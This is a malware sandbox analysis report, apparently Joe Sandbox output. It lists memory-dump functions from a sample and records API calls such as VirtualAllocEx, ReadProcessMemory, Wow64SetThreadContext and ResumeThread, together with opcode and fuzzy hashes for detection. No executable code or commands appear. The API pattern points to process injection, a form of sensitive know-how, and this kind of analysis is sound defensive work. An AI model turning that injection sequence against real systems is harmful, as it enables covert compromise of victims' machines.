Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 93176f2af738c6d937b4da00810176738e715cf9b4241c02d65d862a1eb10dfa
Instruction ID: 5ba1ef1a408a667fd2eefb2b6314a892ef5b30f5f424dafde3066f9bff84fdc4
Opcode Fuzzy Hash: 93176f2af738c6d937b4da00810176738e715cf9b4241c02d65d862a1eb10dfa
Instruction Fuzzy Hash: DB2155B1D003499FCB10CFAAC885BDEBBF5FF48310F10842AE959A7240C7789944DBA4

Function 06FF1A71 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FF1AF8

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 48d725af1e7e982c6e3bde44f9e9334361b38cf3d3c4e678a904672dd1183458
Instruction ID: 2f29c9e8763499f769e137d38d1e00426850330e5e144a9b9bc492b25f8698c8
Opcode Fuzzy Hash: 48d725af1e7e982c6e3bde44f9e9334361b38cf3d3c4e678a904672dd1183458
Instruction Fuzzy Hash: 902148B1C003499FCB10DFAAC885ADEFBF5FF48310F50882AE959A7241D7789945DBA4

Function 06FF13B2 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FF1436

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 93cc02fef2004b68b515d5cb6d88375a605c26dfdf740c0b99d4746f2b09f1d9
Instruction ID: ed197ed5b56db880626820fda1656375bf9504da41f6885fa4cf2a58cc7848f7
Opcode Fuzzy Hash: 93cc02fef2004b68b515d5cb6d88375a605c26dfdf740c0b99d4746f2b09f1d9
Instruction Fuzzy Hash: DD2178B1D003088FCB10DFAAC4847EEBBF4EF89324F54842AD559A7241C778A945CBA0

Function 023DD7A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023DD82F

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c1c0d6acf73945a905f43284bb0862d65a9623d7489fa29effa6566dfc60352e
Instruction ID: 9f20d293ed1288f45a30ca1b0c1115d3ff681fdff7c481207406949039d328f4
Opcode Fuzzy Hash: c1c0d6acf73945a905f43284bb0862d65a9623d7489fa29effa6566dfc60352e
Instruction Fuzzy Hash: AA2103B5D003489FDB10CFAAD884AEEBFF5EB48310F14841AE958A3311D374A945CF64

Function 06FF1A78 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FF1AF8

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2488e937f8522e29862f2a1f684c5e967d3c71494b639d588c1f06419aef88a5
Instruction ID: ee7cbb9484ef2f68a279f4f6f6e4dd533fe65fb79725fd26641d1754dff5f7f7
Opcode Fuzzy Hash: 2488e937f8522e29862f2a1f684c5e967d3c71494b639d588c1f06419aef88a5
Instruction Fuzzy Hash: 072159B1C003499FCB10DFAAC884ADEFBF5FF48310F108429E519A7240C7789905DBA4

Function 06FF13B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FF1436

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7fabfaa3720005e7b09ca081e1efe0ab406b3db60b701dc9bb39d207ea9d0059
Instruction ID: 82c5e5d0890c1095fb54ea1963cf4893dfa1fda4c5839438e258fe7343c984a3
Opcode Fuzzy Hash: 7fabfaa3720005e7b09ca081e1efe0ab406b3db60b701dc9bb39d207ea9d0059
Instruction Fuzzy Hash: 4F2168B1D003098FDB10DFAAC4857EEBBF4EF89324F54842AD559A7240CB789945CFA4

Function 023DD7A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023DD82F

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e3334cc89026c03a56f7d8c02e23eab6ff28a004cee35c38d939f621fd2f1096
Instruction ID: bcc4e52fd64d013eeca87e1f297c34f9c13a22c8b329dfef17dec8910a8b4d8c
Opcode Fuzzy Hash: e3334cc89026c03a56f7d8c02e23eab6ff28a004cee35c38d939f621fd2f1096
Instruction Fuzzy Hash: C521E4B5D003089FDB10CFAAD984ADEBBF5FB48310F14841AE958A3350D374A944CF64

Function 06FF1302 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06FF136A

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8dd9b27e0ee2e942fa7aa56903a1f5acf605cff994200c43e4145d25fef91018
Instruction ID: 010204a1bddc1bb9a0067f33204f1d8cb7a40df48ed355b07e93f5466a4f851e
Opcode Fuzzy Hash: 8dd9b27e0ee2e942fa7aa56903a1f5acf605cff994200c43e4145d25fef91018
Instruction Fuzzy Hash: 251197B1D002488FCB10DFAAC845BDEFFF5EF88324F248859D559A7281CB74A944CB94

Function 06FF18C0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF1936

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6cc66cc1212b180c5c4973281d7855435a7fcc68c691c9c9d1320b5fc9ec9fea
Instruction ID: 6506e73b353ce742f96dbd6b111d1a8cbfc422fe5dd9bdc7de83f7409d1da2b9
Opcode Fuzzy Hash: 6cc66cc1212b180c5c4973281d7855435a7fcc68c691c9c9d1320b5fc9ec9fea
Instruction Fuzzy Hash: D71167B19002489FCB20DFAAC844ADFBFF5FF88320F148819E559A7250CB759A51CFA0

Function 06FF18C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF1936

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 73ef1a56f9b898395b5a6ce317ea6aef67a9c2e0e1bc092805e5ea79fcc6b758
Instruction ID: 994db4fa4cb6632f0882c5af89fe6271a9fca92fe60f159e57c5ca9f83bae737
Opcode Fuzzy Hash: 73ef1a56f9b898395b5a6ce317ea6aef67a9c2e0e1bc092805e5ea79fcc6b758
Instruction Fuzzy Hash: F51167B18003089FCB20DFAAC844ADFBFF5EF88320F148819E559A7250CB75A940CFA0

Function 04B61B30 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B640E7, 04B6417B

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: 8d157edff8dcbf2662f5433f04ccebd97f0bb99d23a82b859b76dff427fb9029
Instruction ID: fc0661580036ed3fac3d01b21a00a7c9231b39d43fb11f2624397148b3398c8c
Opcode Fuzzy Hash: 8d157edff8dcbf2662f5433f04ccebd97f0bb99d23a82b859b76dff427fb9029
Instruction Fuzzy Hash: 06C1A371B007018FDB04EF39D49479A77A2FF88304F1589B9D90AAB396EF74A855CB50

Function 06FF1308 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06FF136A

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 220174a50dedeced5e2d6122882dbd470e7df7a60e44fb9c8e41c24f5bb3a96d
Instruction ID: 7882a6a01e1a7049bb448343a4b1978ce5cd31cc3744a168aaad8a905c622fe0
Opcode Fuzzy Hash: 220174a50dedeced5e2d6122882dbd470e7df7a60e44fb9c8e41c24f5bb3a96d
Instruction Fuzzy Hash: D11136B1D003488FDB20DFAAC8457DEFBF5EF88324F248819D559A7240CB79A945CBA4

Function 06FF6792 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06FF67F5

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e39ec586bf49e3c0e5beb624feb3c83f66428b5e983cea0a03a68364ad8b0855
Instruction ID: 2eaba659a8b9cbe7f8247585f5b5c17be6d1de4c3e08781e235df820cdfdc3d3
Opcode Fuzzy Hash: e39ec586bf49e3c0e5beb624feb3c83f66428b5e983cea0a03a68364ad8b0855
Instruction Fuzzy Hash: E51113B58003499FCB10CF9AC885BDEBFF8EB49320F20885AE559A3210C375A544CFA0

Function 023DB0B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 023DB11E

Memory Dump Source

Source File: 00000000.00000002.1768748027.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23d0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f0ab1651f6d2d0fe58dd3da70e61773c6820c7123af7c02c67133527abaa92d8
Instruction ID: b4aaf1377fed9d690ece4ca6c209ce687b16eabed0dc99260c42aaf5a07f2c9c
Opcode Fuzzy Hash: f0ab1651f6d2d0fe58dd3da70e61773c6820c7123af7c02c67133527abaa92d8
Instruction Fuzzy Hash: 241113B6C007498FCB10CF9AD848BDEFBF5EB88314F11841AD459A7200C375A545CFA1

Function 06FF1D58 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06FF67F5

Memory Dump Source

Source File: 00000000.00000002.1775441965.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff0000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 99792cf05688157a308b70ad924b6b2547af5a48df821c3433f1a06c479f12bc
Instruction ID: 475b79c36ba31d0a4224536775bcaa8f8ff50e8a8d05e483d087005a903b18dc
Opcode Fuzzy Hash: 99792cf05688157a308b70ad924b6b2547af5a48df821c3433f1a06c479f12bc
Instruction Fuzzy Hash: EF1125B58003489FDB10DF8AC888BDEBBF8EB48310F108819E519A7310C775A944CFA0

Function 06C188D8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,023F6428,?,?,?,?,?,?,06C1A0B0,00000000,00000000,?), ref: 06C1A25D

Memory Dump Source

Source File: 00000000.00000002.1774796123.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_SecuriteInfo.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: f4306f6704f46ee3a28161b9d1eb0ea08a834d551fba37c8e966582b1f61841e
Instruction ID: 70a31e47a306c5546f5b0d00e182c12e638c55321c0ad05491f8a2bffb56fc4d
Opcode Fuzzy Hash: f4306f6704f46ee3a28161b9d1eb0ea08a834d551fba37c8e966582b1f61841e
Instruction Fuzzy Hash: 2611F5B58003489FDB10DF9AC849BDEBBF8EB49320F10845AE559A7240C375AA44CFA5

Function 06C1A1F9 Relevance: 1.5, APIs: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,023F6428,?,?,?,?,?,?,06C1A0B0,00000000,00000000,?), ref: 06C1A25D

Memory Dump Source

Source File: 00000000.00000002.1774796123.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_SecuriteInfo.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 37142d86f6683c01c7fe7720248c525394453b301dbfa2334dee7b37bdf90bf2
Instruction ID: 4cc44fd8de0a6d86453336bee48ee2b14508b1df33ee00d0269be31f00e15aa6
Opcode Fuzzy Hash: 37142d86f6683c01c7fe7720248c525394453b301dbfa2334dee7b37bdf90bf2
Instruction Fuzzy Hash: 791115B5800308CFDB10DF9AD889BDEBBF4FB49324F10840AD559A7240C375A684CFA1

Function 04B64037 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B640E7, 04B6417B

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: 2f41768d058d562fcc5b1e0bc528af37751b365fcf58ff410b0d94d13a77766e
Instruction ID: e6a049c462ddc4333c14488cfda7a2404465a0004aa6c8b1e9a192bfd34a1843
Opcode Fuzzy Hash: 2f41768d058d562fcc5b1e0bc528af37751b365fcf58ff410b0d94d13a77766e
Instruction Fuzzy Hash: 51A18275B007018BDB04EF28D49479A77A2FF88304F1589B8D90AAF396DF75A849CB90

Function 06C5C6EA Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

r, xrefs: 06C5C8BB

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: b62e3c44a5b746b52c0d590036d022f5bc280d55e4726fb44868d30021be72a8
Instruction ID: 251583787581f728f6f09d3fd0b54fce8b1918a0a31c6d0f3761e65dea18e40d
Opcode Fuzzy Hash: b62e3c44a5b746b52c0d590036d022f5bc280d55e4726fb44868d30021be72a8
Instruction Fuzzy Hash: 8D914C70909318DFD744CF9AD8849EDBBBAFF49341F529159E80AAB212C730A981CF94

Function 04B61B60 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

Tedq, xrefs: 04B61CC1

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: eefc04773e7302856414cedafe312991ea4c266d8256d18f6df7b75951b3dcfe
Instruction ID: 8ceda6e7b9995b68d65768ae748a4a101e503f34e5df344cc6826f9a22d6e151
Opcode Fuzzy Hash: eefc04773e7302856414cedafe312991ea4c266d8256d18f6df7b75951b3dcfe
Instruction Fuzzy Hash: 09418E71B002158FDB14DF7D984496FBBB6FFC4320B148969E41ADB391EB349D058790

Function 04B6F870 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

(hq, xrefs: 04B6F901

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (hq
API String ID: 0-4060669308
Opcode ID: 69710872be9a930abe83b572c6019cbc707c38ced5551de4511742c690094063
Instruction ID: 7f3eda92b55376159bf908b3fd431074eeba6c19df13f802659040b45bd69e71
Opcode Fuzzy Hash: 69710872be9a930abe83b572c6019cbc707c38ced5551de4511742c690094063
Instruction Fuzzy Hash: 7E41FE35B046604FEB19AB3CA46413E3BE3AFC974471444E9C90BCB392EE2CED028395

Function 06C50040 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

(hq, xrefs: 06C501DD

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (hq
API String ID: 0-4060669308
Opcode ID: 41d0c999b25d4bdb1801c3278300284e194f1f4a1cdc428cb58ccabffb2e5b7d
Instruction ID: d3f8b681892cae32032ca013a325a32fed281524cc5adc0a0bb3b997d545dda1
Opcode Fuzzy Hash: 41d0c999b25d4bdb1801c3278300284e194f1f4a1cdc428cb58ccabffb2e5b7d
Instruction Fuzzy Hash: 3E419171B00204AFDB589F69C8547AEBAE6EF88301F148829E806DB790DF34DD41C795

Function 04B66FD9 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B66FFB

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: 4cb42cb6aa7954baf2d939a9c5df96e247e72b0e59d6522652388828461c5b95
Instruction ID: c4f363445aadf36a5c83e16b96140ef03ecd5bba4cf2c381698224c8c7f931f5
Opcode Fuzzy Hash: 4cb42cb6aa7954baf2d939a9c5df96e247e72b0e59d6522652388828461c5b95
Instruction Fuzzy Hash: B24113387506008FDB15EF68C49896E7BE6FF89705B1584EAE506CB372CB35AC018B50

Function 04B66FE8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B66FFB

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: 8a5d2a94142a98b8348df04bada10c6d2564861fe0e7d04ba08176c99a04dc18
Instruction ID: 2b097338dc1cb9bed84c98d1fc078841db321cc31aeaa1b75af2549c3cc5f510
Opcode Fuzzy Hash: 8a5d2a94142a98b8348df04bada10c6d2564861fe0e7d04ba08176c99a04dc18
Instruction Fuzzy Hash: F931F2387506008FDB14EF68C498A6A7BE6FF89B05B1584E9E506CB371CB75EC408B90

Function 04B675F4 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B67EE6

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: 1ffd028dfee069978c2e14794968f2605d4a26473b7eb0d38ddf72d95b83bc1c
Instruction ID: 2cfb13729dbd6a466a0d592ce6cd79648bc8f4fa859aee66878519063970693e
Opcode Fuzzy Hash: 1ffd028dfee069978c2e14794968f2605d4a26473b7eb0d38ddf72d95b83bc1c
Instruction Fuzzy Hash: 0A31A571E043418BEB04EF69D884B6577A6FF85318F0489B9ED0E6B245EF34B458CB60

Function 04B67E9F Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B67EE6

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: 83c8e459370cf9c786031320ffd415c42536d8443b2279bebbd1bbc1cec8a8e3
Instruction ID: d58331d6ec90556dcb4bd7c2683cddac37958bd5fd251cea68530a8cb81ee7f0
Opcode Fuzzy Hash: 83c8e459370cf9c786031320ffd415c42536d8443b2279bebbd1bbc1cec8a8e3
Instruction Fuzzy Hash: CB319371E043418BEB01EF68D880A6577A5FF85318F058AB9DD4E6B246EF346458CB60

Function 06C5AC7F Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

Tedq, xrefs: 06C5AE4A

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: 5c36a180ac6e5e375da640d6d9c9b15cb12c6de01fff8296b3da5f1312c6f373
Instruction ID: 2785b8afa4e193a316f295c54a1573b9c3130a4797ad9ab39e6c2ca209950f97
Opcode Fuzzy Hash: 5c36a180ac6e5e375da640d6d9c9b15cb12c6de01fff8296b3da5f1312c6f373
Instruction Fuzzy Hash: AE3104B4E042188FDB58DFE6C8446AEBBB6EF89300F10D12AD809AB358DB745945CB94

Function 06C5AC80 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

Tedq, xrefs: 06C5AE4A

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: 3bc7553cba4512b5b9f32576e912a76023a911fd9a1ae205185b5cdcdeb33aac
Instruction ID: 9523e751e65385c50bff537990c4b8103a7515b37ca321b0b5355d481b824c08
Opcode Fuzzy Hash: 3bc7553cba4512b5b9f32576e912a76023a911fd9a1ae205185b5cdcdeb33aac
Instruction Fuzzy Hash: CE3104B4E042188FDB48DFE6C8446AEBBB6EF89300F10D12AD809AB358DB745945CB94

Function 06C56130 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

8hq, xrefs: 06C5619C

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 8hq
API String ID: 0-4057917415
Opcode ID: 0291de3ba59c259943b34e32692b6940f63c60d6d7b538a344753cae65e7828b
Instruction ID: 8020df5e6383f9b846b8d6b9818e220f65253c9606b18bc7231962b70f5118b9
Opcode Fuzzy Hash: 0291de3ba59c259943b34e32692b6940f63c60d6d7b538a344753cae65e7828b
Instruction Fuzzy Hash: 70113A30B14314CFE7849F7A9C04A7B77F6DB88310B55443ADA06DB3A2DA30CE408795

Function 04B63F58 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B6400F

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: a62e461c8d27eb28c7f45022e7999884b6f92e6fd442357b31ac3d24424ce512
Instruction ID: c433aa3f2664812d14f4db5b31c8c51cfca268c1dfd9c44e3278b7952d2de558
Opcode Fuzzy Hash: a62e461c8d27eb28c7f45022e7999884b6f92e6fd442357b31ac3d24424ce512
Instruction Fuzzy Hash: 8511DD313046105BF7296B2894247AF3296AFC8B04F01449ED9438BBD2CFA9AC028BD1

Function 06C5ACFE Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

Tedq, xrefs: 06C5ADD7

Memory Dump Source

Source File: 00000000.00000002.1775128059.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: c632d5569f85815cb42c735926d70ac06c75b421f4753ad214b1c4a91e3ccd6e
Instruction ID: e9f2c937fe2179372da7735947f59131105ab286c2c59aff99680e4c673639a1
Opcode Fuzzy Hash: c632d5569f85815cb42c735926d70ac06c75b421f4753ad214b1c4a91e3ccd6e
Instruction Fuzzy Hash: 5B21EF75E04259CFCB45DFE9D8849ADFBB2FF49300F20816AE918AB361C7316945CB50

Function 04B63F68 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Hf|, xrefs: 04B6400F

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Hf|
API String ID: 0-3957126236
Opcode ID: 1ea9feda973857c63a991fd4ad3589063cfa0bae149923b43308bdf9d6f0a9ee
Instruction ID: 8a33651cb3483cf8b09146a509979e02fc84c4bf9ad1d331f66121ec99457871
Opcode Fuzzy Hash: 1ea9feda973857c63a991fd4ad3589063cfa0bae149923b43308bdf9d6f0a9ee
Instruction Fuzzy Hash: 0011AC313146205BEB187B68D4207AF32DBABC8B04F00445DD9479B7D6CFAEAC024BD5

Function 04B61678 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Tedq, xrefs: 04B616E3

Memory Dump Source

Source File: 00000000.00000002.1773039731.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: 131284c5b632af847723cc7776311e53ba0487e40493a42c62079f35f2f879bd
Instruction ID: 19ab023e7fffe6fb61eb3f8ff0d77e6a45e47717fccea385fd1db4501b10945c
Opcode Fuzzy Hash: 131284c5b632af847723cc7776311e53ba0487e40493a42c62079f35f2f879bd
